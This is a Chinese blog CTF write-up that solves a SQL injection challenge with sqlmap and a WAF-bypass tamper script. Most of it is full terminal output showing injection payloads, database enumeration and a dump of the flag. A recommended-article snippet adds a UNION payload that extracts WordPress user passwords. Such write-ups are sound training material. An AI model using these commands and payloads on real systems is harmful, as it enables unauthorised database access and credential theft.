简单的sql注入之2WP

最新推荐文章于 2024-05-10 11:21:14 发布
最新推荐文章于 2024-05-10 11:21:14 发布
阅读量1.5w 收藏 5
点赞数 1
文章标签: python sql注入 测试 CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yalecaltech/article/details/63704990
版权

这里我们会用到tamper,是python写的,sqlmap一般自带,主要的作用是绕过WAF
空格被过滤可以使用space2comment.py,过滤系统对大小写敏感可以使用randomcase.py等等

流程和简单的sql注入之3是一样的,不过加了–tamper而已
就不截图了,以下是我从KALI的终端上复制的
这里用的level参数是执行测试的等级(1-5,默认为1)
sqlmap默认测试所有的GET和POST参数,当–level的值大于等于2的时候也会测试HTTP Cookie头的值,当大于等于3的时候也会测试User-Agent和HTTP Referer头的值。

root@kali:~# sqlmap -u http://ctf5.shiyanbar.com/web/index_2.php?id=1 –tamper “space2comment.py” –level 2
_
_ | | _ _ {1.0-dev-nongit-201608240a89}
|_ -| . | | | .’| . |
|| |||||,| _|
|| || http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 21:16:47

[21:16:47] [INFO] loading tamper script ‘space2comment’
[21:16:47] [INFO] testing connection to the target URL
[21:16:47] [INFO] heuristics detected web page charset ‘GB2312’
[21:16:47] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[21:16:47] [INFO] testing if the target URL is stable
[21:16:48] [INFO] target URL is stable
[21:16:48] [INFO] testing if GET parameter ‘id’ is dynamic
[21:16:48] [INFO] confirming that GET parameter ‘id’ is dynamic
[21:16:48] [INFO] GET parameter ‘id’ is dynamic
[21:16:48] [INFO] heuristic (basic) test shows that GET parameter ‘id’ might be injectable (possible DBMS: ‘MySQL’)
[21:16:48] [INFO] heuristic (XSS) test shows that GET parameter ‘id’ might be vulnerable to XSS attacks
[21:16:48] [INFO] testing for SQL injection on GET parameter ‘id’
it looks like the back-end DBMS is ‘MySQL’. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for ‘MySQL’ extending provided level (2) and risk (1) values? [Y/n] y
[21:16:54] [INFO] testing ‘AND boolean-based blind - WHERE or HAVING clause’
[21:16:54] [WARNING] reflective value(s) found and filtering out
[21:16:55] [INFO] GET parameter ‘id’ seems to be ‘AND boolean-based blind - WHERE or HAVING clause’ injectable
[21:16:55] [INFO] testing ‘MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause’
[21:16:55] [INFO] GET parameter ‘id’ is ‘MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause’ injectable
[21:16:55] [INFO] testing ‘MySQL inline queries’
[21:16:55] [INFO] testing ‘MySQL > 5.0.11 stacked queries (SELECT - comment)’
[21:16:55] [WARNING] time-based comparison requires larger statistical model, please wait……..
[21:16:55] [INFO] testing ‘MySQL > 5.0.11 stacked queries (SELECT)’
[21:16:55] [INFO] testing ‘MySQL > 5.0.11 stacked queries (comment)’
[21:16:55] [INFO] testing ‘MySQL > 5.0.11 stacked queries’
[21:16:55] [INFO] testing ‘MySQL < 5.0.12 stacked queries (heavy query - comment)’
[21:16:55] [INFO] testing ‘MySQL < 5.0.12 stacked queries (heavy query)’
[21:16:56] [INFO] testing ‘MySQL >= 5.0.12 AND time-based blind (SELECT)’
[21:17:06] [INFO] GET parameter ‘id’ seems to be ‘MySQL >= 5.0.12 AND time-based blind (SELECT)’ injectable
[21:17:06] [INFO] testing ‘Generic UNION query (NULL) - 1 to 20 columns’
[21:17:06] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[21:17:07] [INFO] testing ‘Generic UNION query (NULL) - 22 to 40 columns’
[21:17:09] [INFO] testing ‘MySQL UNION query (NULL) - 1 to 20 columns’
[21:17:09] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[21:17:09] [INFO] target URL appears to have 1 column in query
[21:17:10] [WARNING] if UNION based SQL injection is not detected, please consider and/or try to force the back-end DBMS (e.g. ‘–dbms=mysql’)
[21:17:10] [INFO] testing ‘MySQL UNION query (random number) - 1 to 20 columns’
[21:17:10] [INFO] testing ‘MySQL UNION query (NULL) - 22 to 40 columns’
[21:17:12] [INFO] testing ‘MySQL UNION query (random number) - 22 to 40 columns’
[21:17:16] [INFO] testing ‘MySQL UNION query (NULL) - 42 to 60 columns’
[21:17:17] [INFO] testing ‘MySQL UNION query (random number) - 42 to 60 columns’
[21:17:19] [INFO] testing ‘MySQL UNION query (NULL) - 62 to 80 columns’
[21:17:21] [INFO] testing ‘MySQL UNION query (random number) - 62 to 80 columns’
[21:17:22] [INFO] testing ‘MySQL UNION query (NULL) - 82 to 100 columns’
[21:17:23] [INFO] testing ‘MySQL UNION query (random number) - 82 to 100 columns’
GET parameter ‘id’ is vulnerable. Do you want to keep testing the others (if any)? [y/N] y

sqlmap identified the following injection point(s) with a total of 242 HTTP(s) requests:

Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1’ AND 5580=5580 AND ‘lyjP’=’lyjP

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=1' AND (SELECT 4047 FROM(SELECT COUNT(*),CONCAT(0x71717a7871,(SELECT (ELT(4047=4047,1))),0x716a6b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ZzqN'='ZzqN

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)

Payload: id=1’ AND (SELECT * FROM (SELECT(SLEEP(5)))RGQw) AND ‘ByYo’=’ByYo

[21:18:02] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[21:18:02] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.18, PHP 5.2.17
back-end DBMS: MySQL 5.0
[21:18:02] [INFO] fetched data logged to text files under ‘/root/.sqlmap/output/ctf5.shiyanbar.com’

[*] shutting down at 21:18:02

root@kali:~# sqlmap -u http://ctf5.shiyanbar.com/web/index_2.php?id=1 –tamper “space2comment.py” –current-db
_
_ | | _ _ {1.0-dev-nongit-201608240a89}
|_ -| . | | | .’| . |
|| |||||,| _|
|| || http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 21:18:22

[21:18:22] [INFO] loading tamper script ‘space2comment’
[21:18:22] [INFO] resuming back-end DBMS ‘mysql’
[21:18:23] [INFO] testing connection to the target URL
[21:18:23] [INFO] heuristics detected web page charset ‘GB2312’
[21:18:23] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS

sqlmap resumed the following injection point(s) from stored session:

Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1’ AND 5580=5580 AND ‘lyjP’=’lyjP

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=1' AND (SELECT 4047 FROM(SELECT COUNT(*),CONCAT(0x71717a7871,(SELECT (ELT(4047=4047,1))),0x716a6b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ZzqN'='ZzqN

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)

Payload: id=1’ AND (SELECT * FROM (SELECT(SLEEP(5)))RGQw) AND ‘ByYo’=’ByYo

[21:18:23] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[21:18:23] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.18, PHP 5.2.17
back-end DBMS: MySQL 5.0
[21:18:23] [INFO] fetching current database
[21:18:23] [INFO] retrieved: web1
current database: ‘web1’
[21:18:23] [INFO] fetched data logged to text files under ‘/root/.sqlmap/output/ctf5.shiyanbar.com’

[*] shutting down at 21:18:23

root@kali:~# sqlmap -u http://ctf5.shiyanbar.com/web/index_2.php?id=1 –tamper “space2comment.py” -D web10 –tables
_
_ | | _ _ {1.0-dev-nongit-201608240a89}
|_ -| . | | | .’| . |
|| |||||,| _|
|| || http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 21:18:43

[21:18:43] [INFO] loading tamper script ‘space2comment’
[21:18:43] [INFO] resuming back-end DBMS ‘mysql’
[21:18:43] [INFO] testing connection to the target URL
[21:18:43] [INFO] heuristics detected web page charset ‘GB2312’
[21:18:43] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS

sqlmap resumed the following injection point(s) from stored session:

Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1’ AND 5580=5580 AND ‘lyjP’=’lyjP

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=1' AND (SELECT 4047 FROM(SELECT COUNT(*),CONCAT(0x71717a7871,(SELECT (ELT(4047=4047,1))),0x716a6b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ZzqN'='ZzqN

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)

Payload: id=1’ AND (SELECT * FROM (SELECT(SLEEP(5)))RGQw) AND ‘ByYo’=’ByYo

[21:18:43] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[21:18:43] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.18, PHP 5.2.17
back-end DBMS: MySQL 5.0
[21:18:43] [INFO] fetching tables for database: ‘web10’
[21:18:43] [INFO] fetching number of tables for database ‘web10’
[21:18:43] [WARNING] running in a single-thread mode. Please consider usage of option ‘–threads’ for faster data retrieval
[21:18:43] [INFO] retrieved:
[21:18:43] [WARNING] reflective value(s) found and filtering out
0
[21:18:53] [WARNING] database ‘web10’ appears to be empty
[21:18:53] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q] y
[21:19:00] [INFO] checking table existence using items from ‘/usr/share/sqlmap/txt/common-tables.txt’
[21:19:00] [INFO] adding words used on web page to the check list
please enter number of threads? [Enter for 1 (current)] 10
[21:19:03] [INFO] starting 10 threads
[21:20:37] [INFO] tried 2645/3312 items (80%)
[21:20:37] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request(s)
[21:20:37] [WARNING] if the problem persists please try to lower the number of used threads (option ‘–threads’)

[21:21:09] [WARNING] no table(s) found
No tables found
[21:21:09] [INFO] fetched data logged to text files under ‘/root/.sqlmap/output/ctf5.shiyanbar.com’

[*] shutting down at 21:21:09

root@kali:~# sqlmap -u http://ctf5.shiyanbar.com/web/index_2.php?id=1 –tamper “space2comment.py” -D web1 –tables
_
_ | | _ _ {1.0-dev-nongit-201608240a89}
|_ -| . | | | .’| . |
|| |||||,| _|
|| || http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 21:21:47

[21:21:47] [INFO] loading tamper script ‘space2comment’
[21:21:48] [INFO] resuming back-end DBMS ‘mysql’
[21:21:48] [INFO] testing connection to the target URL
[21:21:48] [INFO] heuristics detected web page charset ‘GB2312’
[21:21:48] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS

sqlmap resumed the following injection point(s) from stored session:

Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1’ AND 5580=5580 AND ‘lyjP’=’lyjP

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=1' AND (SELECT 4047 FROM(SELECT COUNT(*),CONCAT(0x71717a7871,(SELECT (ELT(4047=4047,1))),0x716a6b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ZzqN'='ZzqN

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)

Payload: id=1’ AND (SELECT * FROM (SELECT(SLEEP(5)))RGQw) AND ‘ByYo’=’ByYo

[21:21:48] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[21:21:48] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.18, PHP 5.2.17
back-end DBMS: MySQL 5.0
[21:21:48] [INFO] fetching tables for database: ‘web1’
[21:21:48] [INFO] the SQL query used returns 2 entries
[21:21:48] [INFO] retrieved: flag
[21:21:48] [INFO] retrieved: web_1
Database: web1
[2 tables]
+——-+
| flag |
| web_1 |
+——-+

[21:21:48] [INFO] fetched data logged to text files under ‘/root/.sqlmap/output/ctf5.shiyanbar.com’

[*] shutting down at 21:21:48

root@kali:~# sqlmap -u http://ctf5.shiyanbar.com/web/index_2.php?id=1 –tamper “space2comment.py” -D web1 -T flag –columns
_
_ | | _ _ {1.0-dev-nongit-201608240a89}
|_ -| . | | | .’| . |
|| |||||,| _|
|| || http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 21:22:17

[21:22:17] [INFO] loading tamper script ‘space2comment’
[21:22:17] [INFO] resuming back-end DBMS ‘mysql’
[21:22:17] [INFO] testing connection to the target URL
[21:22:17] [INFO] heuristics detected web page charset ‘GB2312’
[21:22:17] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS

sqlmap resumed the following injection point(s) from stored session:

Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1’ AND 5580=5580 AND ‘lyjP’=’lyjP

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=1' AND (SELECT 4047 FROM(SELECT COUNT(*),CONCAT(0x71717a7871,(SELECT (ELT(4047=4047,1))),0x716a6b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ZzqN'='ZzqN

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)

Payload: id=1’ AND (SELECT * FROM (SELECT(SLEEP(5)))RGQw) AND ‘ByYo’=’ByYo

[21:22:17] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[21:22:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.18, PHP 5.2.17
back-end DBMS: MySQL 5.0
[21:22:17] [INFO] fetching columns for table ‘flag’ in database ‘web1’
[21:22:17] [INFO] the SQL query used returns 2 entries
[21:22:17] [INFO] retrieved: flag
[21:22:17] [INFO] retrieved: char(30)
[21:22:18] [INFO] retrieved: id
[21:22:18] [INFO] retrieved: int(4)
Database: web1
Table: flag
[2 columns]
+——–+———-+
| Column | Type |
+——–+———-+
| flag | char(30) |
| id | int(4) |
+——–+———-+

[21:22:18] [INFO] fetched data logged to text files under ‘/root/.sqlmap/output/ctf5.shiyanbar.com’

[*] shutting down at 21:22:18

root@kali:~# sqlmap -u http://ctf5.shiyanbar.com/web/index_2.php?id=1 –tamper “space2comment.py” -D web1 -T flag -C flag –dump
_
_ | | _ _ {1.0-dev-nongit-201608240a89}
|_ -| . | | | .’| . |
|| |||||,| _|
|| || http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 21:22:35

[21:22:35] [INFO] loading tamper script ‘space2comment’
[21:22:35] [INFO] resuming back-end DBMS ‘mysql’
[21:22:35] [INFO] testing connection to the target URL
[21:22:35] [INFO] heuristics detected web page charset ‘GB2312’
[21:22:35] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS

sqlmap resumed the following injection point(s) from stored session:

Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1’ AND 5580=5580 AND ‘lyjP’=’lyjP

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=1' AND (SELECT 4047 FROM(SELECT COUNT(*),CONCAT(0x71717a7871,(SELECT (ELT(4047=4047,1))),0x716a6b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ZzqN'='ZzqN

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)

Payload: id=1’ AND (SELECT * FROM (SELECT(SLEEP(5)))RGQw) AND ‘ByYo’=’ByYo

[21:22:35] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[21:22:35] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.18, PHP 5.2.17
back-end DBMS: MySQL 5.0
[21:22:35] [INFO] fetching entries of column(s) ‘flag’ for table ‘flag’ in database ‘web1’
[21:22:35] [INFO] the SQL query used returns 1 entries
[21:22:35] [INFO] retrieved: flag{Y0u_@r3_5O_dAmn_90Od}
[21:22:35] [INFO] analyzing table dump for possible password hashes
Database: web1
Table: flag
[1 entry]
+—————————-+
| flag |
+—————————-+
| flag{Y0u_@r3_5O_dAmn_90Od} |
+—————————-+

[21:22:35] [INFO] table ‘web1.flag’ dumped to CSV file ‘/root/.sqlmap/output/ctf5.shiyanbar.com/dump/web1/flag.csv’
[21:22:35] [INFO] fetched data logged to text files under ‘/root/.sqlmap/output/ctf5.shiyanbar.com’

[*] shutting down at 21:22:35

最近读到两篇两篇不错的文章,可供参考:
1.http://www.freebuf.com/articles/web/10789.html
2.https://www.waitalone.cn/sqlmap-users-manual.html

Elwood Ying
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQLmap使用入门
zhugl的博客
03-09 2775
sqlmap是一个强大的开源渗透测试工具,它可以自动检测和利用SQL注入漏洞并接管数据库服务器的过程。当把url交给sqlmap时,若有漏洞sqlmap则会返回数据库版本信息等。 它支持MySQL, Oracle, PostgreSQL, DB2, SQLite等众多数据库 它支持六种SQL注入技术(boolean-based blind, time-based blind, error-bas...
iwebsec靶场 SQL注入漏洞通关笔记10- 双重url编码绕过
mooyuan的博客
11-30 2816
打开靶场,url为id=1如下所示SQL注入主要分析几个内容(1)闭合方式是什么?iwebsec的第10关关卡为数字型,无闭合(2)注入类别是什么?这部分是普通的报错型注入(3)是否过滤了关键字?很明显通过源码,iwebsec的第10关卡过滤了select关键字并且进行了双重url解码了解了如上信息就可以针对性进行SQL渗透,使用sqlmap工具渗透更是事半功倍,以上就是今天要讲的双重url解码型注入内容,初学者建议按部就班先使用手动注入练习,再进行sqlmap渗透。
注入灵魂_【HTB】Validation(sql注入)_手把手教攻防技巧
最新发布
程序员六七的博客
05-10 885
本文渗透的主机经过合法授权。本文使用的工具和方法仅限学习交流使用,请不要将文中使用的工具和渗透思路用于任何非法用途,对此产生的一切后果,本人不承担任何责任
渗透测试基础篇——sqlmap,nmap,burp工具使用
kreas的博客
05-31 1384
源系统向目标系统发一个 syn 请求,请求中包含一个端口号,如果目标端口开启,目标系统通过 syn/ack 来响应源系统,源系统通过 rst 响应目标系统,来断开连接。可以选择主动扫描或者被动扫描,主动扫描过程中会发送新的请求 payload 验证漏洞,被动扫描时 bp 不会重新发送请求,在已经存在的请求和应答分析。使用 FIN 进行测试,T 表示扫描过程中的时序(0-5),值越高扫描速度越快,容易被防火墙屏蔽。主动扫描:xss,http 头注入,重定向,sql 注入,命令行注入,文件遍历、
CTF会使用到的工具(边刷题边更新)
m0_37442062的博客
04-09 780
WEB Sqlmap免Python环境版 常用的sqlmap命令——Sqlmap基础命令介绍及常用命令 例题练习 这个看起来有点简单 [root@Hacker~]# Sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" --current-db //my_db数据库类型 [root@Hacker~]# Sqlmap -u "h...
sqlmap工具使用手册
u012002125的博客
06-17 2246
sqlmap 是一个开源渗透测试工具,它可以自动检测和利用 SQL 注入漏洞来接管数据库服务器。它具有强大的检测引擎,同时有众多强大功能,包括数据库指纹识别、从数据库中获取数据、访问底层文件系统以及在操作系统上带内连接执行命令。...
arkainte_wp_onegen_sql_源码
10-02
4. **安全性**:在处理SQL源码时,必须考虑SQL注入攻击。Arkainte_wp.sql中的所有动态SQL都应使用参数化查询或预编译语句,以防止恶意输入。 5. **性能优化**:源码可能包含了针对WordPress数据库性能优化的SQL语句...
WordPress 5.8.3 SQL注入漏洞 CVE-2022-21661.pdf
09-27
这是最近爆出来的一个 wordpress 的 SQL 注入漏洞,实际上不是一个可以直接利用的洞,而是wordpress 的一个核心函数 WP_Query 的漏洞,这个函数常被插件使用,因此能造成的危害也挺大,前台后台都有可能
wp2
03-27
8. **安全编程**:在PHP和WordPress开发中,了解如何防止SQL注入、XSS攻击和其他安全威胁,使用预处理语句、过滤用户输入、保持代码更新等。 9. **性能优化**:学习如何提高WordPress网站的性能,例如通过缓存策略...
wp开发代码2-6
01-14
- **安全实践**:提供关于代码安全、防止SQL注入、XSS攻击等方面的建议。 这些章节内容旨在帮助开发者深入理解WordPress的工作原理,掌握从基础到高级的开发技巧,从而能够构建出功能强大且个性化的网站。通过实践...
赛博地球杯工业互联网安全大赛wp1
08-03
在 WP1 中,我们还可以看到 sqlmap 工具的使用,sqlmap 是一种自动 SQL 注入工具,用于检测和利用 SQL 注入漏洞。 四、Web 应用安全 在 WP1 中,我们可以看到 Web 应用安全的相关知识点,例如输入验证、SQL 注入和...
iwebsec靶场 SQL注入漏洞通关笔记7- 空格过滤绕过
mooyuan的博客
11-27 1341
打开靶场,url为iwebsec靶场 SQL注入漏洞通关笔记7- 空格过滤绕过(1)闭合方式是什么?iwebsec的第7关关卡为数字型,无闭合(2)注入类别是什么?这部分是普通的数字型注入,使用union法即可注入成功(3)是否过滤了关键字?很明显通过源码,iwebsec的第07关卡过滤了空格。
牛掰!从sql注入到连接3389只需这几步
Appleteachers的博客
05-21 2114
REST 是一种现代架构风格,它定义了一种设计 Web 服务的新方法。和之前的 HTTP 以及 SOA 不同,它不是一个协议(即:一套严格的规则),而是一些关于 Web 服务应该如何相互通信的一些建议和最佳实践。按照 REST 最佳实践开发的服务被称为 “RESTful Web 服务”。 安全性是 RESTful 服务的基石。启用它的方法之一是尽可能内置用户身份验证和授权机制。 在 RESTful 服务中实现用户身份验证和授权的方法有很多。我们今天要讲的主要方法(或标准)有: Basic 认证 OAuth
第一次校赛sql复现
树木常青的博客
05-02 264
前言 上周参加了第一次校赛,就做了web和一个Misc签到,其他的都不会。感觉web除了sql注入,其他的题都挺签到的,大概是学长怕打击到我们吧。。。sql注入那个题在学长的N次提示下终于找到了注入点,然后尴尬的事情发生了,我注入的payload记不清了。。。这还不是最尬的,最尬的是我Python盲注脚本不熟,当时又稍微有一点紧张,然后选择burpsuite+手工对照ascii表注入。。。嗯,懂的都懂,尬死了。还好学长没往里面加类似“xxx_want_a_girlfriend”之类的,这要是换成极客大挑战f
“百度杯” CTF比赛 九月场 Web-Login
qq_34106499的博客
01-17 585
1. 审查源码需要仔细认真; 2. 抓包查看请求头和响应头,关注陌生属性; 3. php中反序列化的应用; 4.base64编码的使用 5. gzcompress()压缩及gzuncompress()解压的应用。
info testing mysql_和讯财经某APP接口SQL注射
weixin_31062533的博客
02-06 112
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: #1* (URI)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: http...
SQLmap实战记录
热门推荐
积木网络
08-22 1万+
【-u/--url="url"】 #后面接目标网址,表示测试的目标地址。 【-v/--level=number】 #number=[0-5],表示测试结果的详细程度。数值越大,内容越详细。 sqlmap.py -u “url” -v 0-5 或 sqlmap.py --url="url" --level=0-5 通过以上参数,会得到: 1、目标的操作系统信息 2、数据库的类
iwebsec靶场 SQL注入漏洞通关笔记12-等价函数替换绕过
mooyuan的博客
12-02 828
总结 SQL注入主要分析几个内容 (1)闭合方式是什么?iwebsec的第12关关卡为数字型,无闭合 (2)注入类别是什么?这部分是普通的数字型注入,使用union法即可注入成功 (3)是否过滤了关键字?很明显通过源码,iwebsec的第12关卡过滤了等号关键字 了解了如上信息就可以针对性进行SQL渗透,使用sqlmap工具渗透更是事半功倍,以上就是今天要讲的等号过滤绕过的SQL注入渗透内容,初学者建议按部就班先使用手动注入练习,再进行sqlmap渗透。
wordpress sql注入复现
04-29
WordPress SQL注入漏洞是指攻击者通过构造恶意SQL语句,利用WordPress的SQL查询接口,成功地向WordPress数据库中插入或者篡改数据,甚至可以直接获取管理员权限。以下是一个简单的复现过程: 1. 在WordPress网站的搜索框中输入以下内容: ``` ' UNION SELECT null, user_login, user_pass FROM wp_users-- ``` 2. 点击搜索按钮,可以看到网站返回的SQL语句中已经将当前WordPress网站的用户名和密码列举出来了。 3. 攻击者可以利用这个漏洞,将恶意代码插入到WordPress数据库中,从而获取网站的控制权。 需要注意的是,为了复现这个漏洞,需要对WordPress进行一定的设置和环境搭建。在实际攻击中,攻击者可能会通过其他途径进行攻击。建议管理员及时更新WordPress版本并采取安全措施来防范此类漏洞。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值